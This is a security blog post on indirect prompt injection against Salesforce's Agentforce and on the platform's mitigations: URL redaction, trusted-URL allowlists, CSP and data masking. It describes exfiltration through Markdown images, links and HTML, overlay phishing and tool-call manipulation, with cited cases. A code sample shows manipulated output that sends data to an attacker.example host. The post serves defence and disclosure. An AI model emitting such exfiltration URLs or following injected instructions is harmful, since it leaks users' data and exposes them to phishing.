One key way Salesforce mitigates AI risk
Agentforce, Salesforce's agentic AI, faces data exfiltration and phishing threats stemming from indirect prompt injection; we detail how it mitigates this risk.
What is Agentforce, and what risks does it face?
Agentforce is Salesforce's agentic AI layer. Its agents read CRM records, draft communications, and take actions, returning generated output to users inside the Salesforce web app.
Because those agents act on data they ingest (for example, Web-to-Lead submissions), an attacker who places an indirect prompt injection in that data can manipulate the agent's output to attempt several well-known attacks:
Markdown image-based data exfiltration. If the model is manipulated to output an externally sourced markdown image with user data appended to the URL, data can be exfiltrated as soon as the image renders in chat with no click required. PromptArmor's Threat Intelligence Team disclosed this vulnerability across several apps, including exfiltration of connected data sources from OpenAI's Codex and sensitive emails from Superhuman AI.
Markdown link-based data exfiltration and phishing. A generated link can carry data in its URL or send the user to a credential-harvesting page dressed up as a routine action. PromptArmor demonstrated how Slack AI could be manipulated to present a malicious hyperlink that exfiltrated API keys from private Slack channels when clicked.
HTML overlay phishing. If HTML is not sanitized from agent output, manipulated output can overwrite the user's interface by rendering iFrames of attacker sites. PromptArmor published on this vulnerability, showing how vLex (now Clio) rendered fake login pop-ups. This technique was also used to overwrite the entire user interface in Ollama.
HTML-based data exfiltration. If externally sourced HTML (or CSS) is generated and rendered, with sensitive data appended to the element's source URL, that data can be exfiltrated. This vulnerability was disclosed to and remediated by vLex (now Clio) alongside the HTML overlay exploit, and Ollama also exhibited this risk.
Tool-call manipulation. Any agent that can call tools and interact with data can be manipulated into taking actions at the direction of a prompt injection. PromptArmor demonstrated this risk, showing that Copilot Cowork can exfiltrate files from Drive and SharePoint due to a missing human-in-the-loop step, and that ChatGPT for Google Sheets could exfiltrate user workbooks via tool-call manipulation.
The first four attacks described above share a key characteristic: an attacker-controlled URL that survives into the agent's rendered output.
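To make that shared characteristic concrete, here is a minimal sketch that pulls URLs out of a piece of agent output along the rendering paths discussed above: Markdown images, Markdown links, and HTML src/href attributes. The regular expressions, the function name find_output_urls, and the attacker.example domain are illustrative assumptions, not part of any Salesforce or PromptArmor tooling, and the patterns are deliberately simplified.

```python
import re

# Hypothetical, simplified patterns for the rendering paths described above.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((\S+?)\)")         # ![alt](url)
MD_LINK = re.compile(r"(?<!!)\[[^\]]*\]\((\S+?)\)")     # [text](url), not preceded by "!"
HTML_URL_ATTR = re.compile(r"""(?:src|href)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def find_output_urls(text: str) -> dict[str, list[str]]:
    """Group the URLs found in agent output by the way they would be rendered."""
    return {
        "markdown_image": MD_IMAGE.findall(text),
        "markdown_link": MD_LINK.findall(text),
        "html_attribute": HTML_URL_ATTR.findall(text),
    }


# Illustrative manipulated output; "SECRET" stands in for appended user data.
sample = (
    "Done. ![x](https://attacker.example/p.png?d=SECRET) "
    "[Reset password](https://attacker.example/login) "
    '<iframe src="https://attacker.example/overlay"></iframe>'
)
found = find_output_urls(sample)
```

In every case the attack only works if the attacker's URL is still present when the output is rendered, which is the property a URL-level defense targets.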
The defense: URL redaction
When an agent's response is rendered inside the Salesforce web app, any URL not designated as a trusted URL is stripped from the output and replaced with the literal string [URL_REDACTED]. Because Markdown and HTML-based data exfiltration attacks rely on untrusted URLs reaching rendered output, redacting those URLs substantially reduces the attack surface.
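The behavior can be approximated with a short sketch. This is not Salesforce's implementation: the URL regular expression, the TRUSTED_HOSTS set, the help.example.com host, and the function name redact_untrusted_urls are all assumptions made for illustration. Only the [URL_REDACTED] replacement string comes from the observed behavior.

```python
import re
from urllib.parse import urlsplit

REDACTED = "[URL_REDACTED]"

# Hypothetical allowlist standing in for an org's configured trusted URLs.
TRUSTED_HOSTS = {"help.example.com"}

# Simplified URL matcher: stops at whitespace, quotes, angle brackets,
# and the closing ")" or "]" of Markdown syntax.
URL_PATTERN = re.compile(r"https?://[^\s<>\"')\]]+", re.IGNORECASE)


def redact_untrusted_urls(text: str, trusted_hosts=TRUSTED_HOSTS) -> str:
    """Replace every URL whose host is not explicitly trusted."""

    def replace(match: re.Match) -> str:
        url = match.group(0)
        try:
            host = urlsplit(url).hostname or ""
        except ValueError:
            # Malformed URLs are treated as untrusted.
            return REDACTED
        return url if host in trusted_hosts else REDACTED

    return URL_PATTERN.sub(replace, text)


redacted = redact_untrusted_urls(
    "![x](https://attacker.example/p.png?d=SECRET) "
    "see https://help.example.com/article"
)
```

Note that the surrounding Markdown image syntax is left in place; with the URL gone, there is nothing for the client to fetch and no query string to carry data out.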
How redaction addresses risks
This analysis describes Agentforce Chat inside the Salesforce web app. Salesforce ships many more AI features, exposes MCP servers, and presents a large attack surface overall, so URL redaction addresses only a subset of the risk. For example, the agent's ability to call tools in Agentforce requires other defenses, such as human-in-the-loop approval, to prevent attacks like the exploit against Microsoft Copilot Cowork.
Configurations for Salesforce AI output processing
First, some use cases require certain URLs to appear in model output. To allow specific URLs, configure the following:
Restrict and allowlist output URLs. To allow agents to output external URLs, add each one explicitly:
Setup → Quick Find → "Trusted URLs" → Trusted URLs → New Trusted URL
Avoid wildcard patterns that allow any site hosting user-generated or otherwise untrusted content.
Set CSP directives in the same settings page to disallow img-src unless images are meant to render from the target domain. This reduces the risk of Markdown image-based data exfiltration.
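The wildcard caution can be illustrated with a small sketch. It assumes glob-style host matching via Python's fnmatch, which may differ from how Salesforce evaluates Trusted URL patterns; the function name host_allowed and the sharing.example hosts are hypothetical.

```python
from fnmatch import fnmatch


def host_allowed(host: str, patterns: list[str]) -> bool:
    """Return True if the host matches any allowlist pattern (glob-style)."""
    return any(fnmatch(host.lower(), pattern.lower()) for pattern in patterns)


# A wildcard entry admits every subdomain, including ones an attacker controls
# on a platform that hosts user-generated content.
wildcard_result = host_allowed("attacker-content.sharing.example", ["*.sharing.example"])

# An explicit entry admits only the host that was reviewed.
explicit_result = host_allowed("attacker-content.sharing.example", ["docs.sharing.example"])
```

With the wildcard entry, the attacker-controlled subdomain is treated as trusted and its URLs would not be redacted; with the explicit entry, it is not.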
Next, we note several Salesforce settings that reduce the risk surface for indirect prompt injection:
Mask sensitive data in the Einstein Trust Layer.
Masking data works by substituting sensitive data with a placeholder before a prompt is sent to the LLM. This prevents the agent, under the influence of a prompt injection, from taking actions such as encoding sensitive data and appending the encoded result to a malicious URL.
Configure data masking here:
Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Data Masking → Large Language Model Data Masking
Turn on Large Language Model Data Masking first; it is the parent category, and the options below are only applicable once it is on.
Pattern-based masking is available and can be enabled for the following data types: Name, Email Address, Phone Number, Credit Card, US SSN, US ITIN, US Drivers License, Passport, IBAN Code, and Company Name.
Data Masking → Pattern-based → Sensitive Data
Field-based masking covers fields by compliance category (PII, HIPAA, GDPR, PCI, COPPA, and CCPA) and by data sensitivity level (Public, Internal, Confidential, Restricted, and Mission Critical).
Data Masking → Field-based → Compliance Categories / Data Sensitivity Levels
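As a rough illustration of the placeholder substitution described above, the following sketch masks two of the pattern-based data types before a prompt would be sent to a model. The regular expressions, the placeholder format, and the function name mask_sensitive are assumptions for illustration only; the Einstein Trust Layer's actual detection logic and placeholder format are not documented here.

```python
import re

# Hypothetical, simplified detectors for two of the listed data types.
PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    "US_SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}


def mask_sensitive(text: str) -> tuple[str, dict[str, str]]:
    """Replace detected values with placeholders and return the mapping."""
    mapping: dict[str, str] = {}
    for label, pattern in PATTERNS.items():

        def substitute(match: re.Match, label: str = label) -> str:
            # Placeholder numbering is global across all data types.
            placeholder = f"<{label}_{len(mapping) + 1}>"
            mapping[placeholder] = match.group(0)
            return placeholder

        text = pattern.sub(substitute, text)
    return text, mapping


masked, mapping = mask_sensitive("Contact jane@example.com, SSN 123-45-6789")
```

Because the model only ever sees the placeholders, an injected instruction to encode the contact's details into a URL has nothing sensitive to encode.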
Prompt injection detection (beta)
Salesforce additionally offers a prompt injection detection setting:
Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Safety & Security → Prompt Injection Detection
However, this setting is currently in beta and subject to beta terms; under those terms, Salesforce appears to train AI on customer data when prompt injection detection is enabled.